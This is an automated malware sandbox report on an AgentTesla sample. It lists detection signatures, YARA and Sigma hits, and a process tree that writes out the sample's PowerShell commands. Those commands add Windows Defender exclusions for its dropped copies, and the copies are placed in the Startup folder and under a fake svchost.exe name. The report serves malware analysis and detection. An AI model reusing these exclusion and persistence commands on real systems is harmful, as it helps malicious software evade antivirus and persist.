Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report VknMvPoCXZ

Overview

General Information

Sample Name:VknMvPoCXZ (renamed file extension from none to exe)
Analysis ID:483863
MD5:0cecfa83ee6ea6dd1de38462bbedf15c
SHA1:de4dde34707658d98f50de8cf2a182bf7ded2a45
SHA256:a6bdce859b5373990681d6ed6c6133a80330fa2744ea9c1e88018d03ab77feb2
Tags:AfiaWaveEnterprisesOyAgentTeslaexesigned
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Yara detected AntiVM3
Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Sigma detected: Powershell adding suspicious path to exclusion list
Drops PE files to the startup folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Creates autostart registry keys with suspicious names
Drops executables to the windows directory (C:\Windows) and starts them
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Drops PE files with benign system names
Creates an autostart registry key pointing to binary in C:\Windows
Writes to foreign memory regions
Changes security center settings (notifications, updates, antivirus, firewall)
Sigma detected: Powershell Defender Exclusion
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Creates files inside the system directory
Found potential string decryption / allocating functions
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • VknMvPoCXZ.exe (PID: 2244 cmdline: 'C:\Users\user\Desktop\VknMvPoCXZ.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
    • AdvancedRun.exe (PID: 3336 cmdline: 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5908 cmdline: 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 2968 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2196 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5456 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1036 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6288 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 481F404B.exe (PID: 6392 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
      • AdvancedRun.exe (PID: 6644 cmdline: 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
        • AdvancedRun.exe (PID: 6204 cmdline: 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /SpecialRun 4101d8 6644 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • powershell.exe (PID: 6784 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 7008 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6812 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4308 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4988 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 1284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6748 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6804 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6828 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • aspnet_compiler.exe (PID: 6872 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • WerFault.exe (PID: 3880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 3756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4132 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5888 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6048 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4928 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4736 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 736 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5264 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • 481F404B.exe (PID: 6852 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
    • AdvancedRun.exe (PID: 6512 cmdline: 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 3152 cmdline: 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /SpecialRun 4101d8 6512 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6992 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5952 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4776 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2256 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5004 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6952 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 2036 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5900 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2244 -ip 2244 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5532 cmdline: 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
    • AdvancedRun.exe (PID: 6820 cmdline: 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6692 cmdline: 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /SpecialRun 4101d8 6820 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 7112 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2896 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6152 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7132 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6496 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 4496 cmdline: 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
    • AdvancedRun.exe (PID: 6932 cmdline: 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • svchost.exe (PID: 6876 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5892 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 53 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.0.VknMvPoCXZ.exe.38d97c0.25.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              1.0.VknMvPoCXZ.exe.38d97c0.25.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                1.0.VknMvPoCXZ.exe.39197e0.9.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  1.0.VknMvPoCXZ.exe.39197e0.9.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    1.0.VknMvPoCXZ.exe.38d97c0.25.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 99 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Powershell Defender ExclusionShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\VknMvPoCXZ.exe' , ParentImage: C:\Users\user\Desktop\VknMvPoCXZ.exe, ParentProcessId: 2244, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, ProcessId: 2968
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\VknMvPoCXZ.exe' , ParentImage: C:\Users\user\Desktop\VknMvPoCXZ.exe, ParentProcessId: 2244, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, ProcessId: 2968
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132762180470220038.2968.DefaultAppDomain.powershell

                      Malware Analysis System Evasion:

                      barindex
                      Sigma detected: Powershell adding suspicious path to exclusion listShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\VknMvPoCXZ.exe' , ParentImage: C:\Users\user\Desktop\VknMvPoCXZ.exe, ParentProcessId: 2244, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force, ProcessId: 5456

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: VknMvPoCXZ.exeVirustotal: Detection: 47%Perma Link
                      Source: VknMvPoCXZ.exeReversingLabs: Detection: 44%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeReversingLabs: Detection: 44%
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeReversingLabs: Detection: 44%

                      Exploits:

                      barindex
                      Yara detected UAC Bypass using CMSTPShow sources
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.VknMvPoCXZ.exe.3ba8c40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.7380000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.VknMvPoCXZ.exe.3ba8c40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3fa14c0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.21.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.27.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.481F404B.exe.4430a90.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.36.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.6bd0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3ef0098.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.481F404B.exe.4430a90.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.27.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.6bd0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.svchost.exe.3d58c40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.37d17e0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.21.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.7380000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.36.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.35.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.35.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.37d17e0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.svchost.exe.3d58c40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3fa14c0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.430706914.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.593102084.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
